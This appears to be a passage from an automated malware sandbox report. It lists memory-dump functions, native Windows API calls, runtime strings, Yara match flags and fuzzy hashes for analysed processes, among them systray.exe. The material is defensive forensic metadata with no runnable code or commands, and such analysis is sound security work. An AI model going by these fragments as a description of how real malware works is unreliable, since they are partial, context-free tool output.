Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 537d6261ee2b61f802fa8ca0c61e8041d4b6605e045406cde82efea1451c2042
Instruction ID: 6655b16f0650f7b97aa4ea8706c48ec0bab12e7c24aa7770bb7f133a35798d25
Opcode Fuzzy Hash: 537d6261ee2b61f802fa8ca0c61e8041d4b6605e045406cde82efea1451c2042
Instruction Fuzzy Hash: 59218F7290022DABDF20EE58CC49AEB73ACFB50704F444555F856D3241DF74EA598BE1

Uniqueness

Uniqueness Score: -1.00%

Function 008653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A22F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008A22FC
RTL: Re-Waiting, xrefs: 008A2328
RTL: Resource at %p, xrefs: 008A230B

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 1ec60df9924a8d7420f6ae7ccbc630ed5e2ff7dec621667107d5af8c622c1b3f
Instruction ID: 846e5c138287798e3c49dc6e2b7f599e24e904b23faf8e6ba472c83feaf15288
Opcode Fuzzy Hash: 1ec60df9924a8d7420f6ae7ccbc630ed5e2ff7dec621667107d5af8c622c1b3f
Instruction Fuzzy Hash: 525126716007056BEF25EB2CCC81FA67398FF56760F114229FD04DB781EA64EC4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 0086EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008A24BD
RTL: Re-Waiting, xrefs: 008A24FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008A248D

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 527a6db6e530137deebc86510a2bf2dce64f1c1e9be2c672f8e75962c08dbba0
Instruction ID: fb35fb4b4d32b0e6d079d4938f495709c96b3e66186b61ee30ebb3c56d424afc
Opcode Fuzzy Hash: 527a6db6e530137deebc86510a2bf2dce64f1c1e9be2c672f8e75962c08dbba0
Instruction Fuzzy Hash: 18410570A00208ABDB34EBACCC85F6A77A8FF49720F208605F515EB6D1D674E94187A5

Uniqueness

Uniqueness Score: -1.00%

Function 0087FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0087FD94

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 558b2162ed6b93d0ba3fbfac3104352c126bb81a5c0d458ea2e27ef3e8345b7c
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 0E919032D0020AEBDF24DF59C8456AEBBB0FF55318F24C47AD519EA157E7309A81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0086B7D3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0083FAE8: LdrInitializeThunk.NTDLL ref: 0083FAF3

__aullrem.LIBCMT ref: 0086B816
__aullrem.LIBCMT ref: 0086B83D

Strings

qISz, xrefs: 0086B843

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: __aullrem$InitializeThunk
String ID: qISz
API String ID: 241165383-2898933791
Opcode ID: b1432f3adf0c16c6cff5321c0c1a2b607a27ab23cf0adcc156d5059065236387
Instruction ID: 0bcd45e425b209d3681f62ca8f1d77e9a64f875ca501d6d37fddd37afdb13e66
Opcode Fuzzy Hash: b1432f3adf0c16c6cff5321c0c1a2b607a27ab23cf0adcc156d5059065236387
Instruction Fuzzy Hash: D301DDB2A04208BFFB14D798CD4AFDF76ADEBC1358F250115B211E72C2D5B49D018765

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: systray.exe PID: 2396 Parent PID: 1388 systray.exeCOMMON

Executed Functions

Function 00099D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099DAD

Strings

.z`, xrefs: 00099D9D, 00099DA8

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 63cb80dc364295cf340fb5e817a82d429ee0f25d7d9631c0e925bfb349143eeb
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: B8F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00099DB3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099DAD

Strings

.z`, xrefs: 00099D9D, 00099DA8

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 1270986dc5d6271d0335c7e56d4d7975317fa13affcb6f3f03ea065767ab7d81
Instruction ID: 757ae84f660f5740fd2edf284ed335dda21570b6c77b929370078d975735f06e
Opcode Fuzzy Hash: 1270986dc5d6271d0335c7e56d4d7975317fa13affcb6f3f03ea065767ab7d81
Instruction Fuzzy Hash: 7AF0AFB2204109AF8B08CF9CD881CEB77AABF8C704B11921DF919E7255D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099E8A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5

Strings

M, xrefs: 00099EAC, 00099EB4

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: M
API String ID: 3535843008-4211545630
Opcode ID: ad5afc3148f99549f5dde0f0605669d6318dc98e686d215ef7c054ea05fb200f
Instruction ID: becffe752606bc17fc3086a206f9385e2388185129b0db1276846e414cc6c2e8
Opcode Fuzzy Hash: ad5afc3148f99549f5dde0f0605669d6318dc98e686d215ef7c054ea05fb200f
Instruction Fuzzy Hash: C7E08C36201204AFD710EF98DC86EA77B69EF88710F168098BE186B352C630F5248BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00099E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5

Strings

M, xrefs: 00099EAC, 00099EB4

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: M
API String ID: 3535843008-4211545630
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 38dda25029afe3172f76972a2fe7647abf86c968db1867b573677de5ec081c4c
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 06D012752002146BD710EB98CC85ED7775CEF44750F154455BA585B242C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00099E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 00099E55

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: c1dbbdede6ca734d3b6ae3ff421215ba9194ca1b8af34a3d35a52b2938fa7461
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 38F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158248BA1DA7241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F79

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 7f7d3c63fc8a91ffcb1dfd4a579ead8bd4f3f7c587b654bacbd3ae9f6f840db4
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 57F015B2200208ABCB14DF89CC81EEB77ADEF88750F118148BE08A7241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01E100C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E100CF

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 01E107AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E107B7

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 01E0F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0F9FB

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 01E0F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0F90E

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FBC3

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FB73

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FB5B

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FAF3

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FADB

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FAC3

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FDCB

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FD9A

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
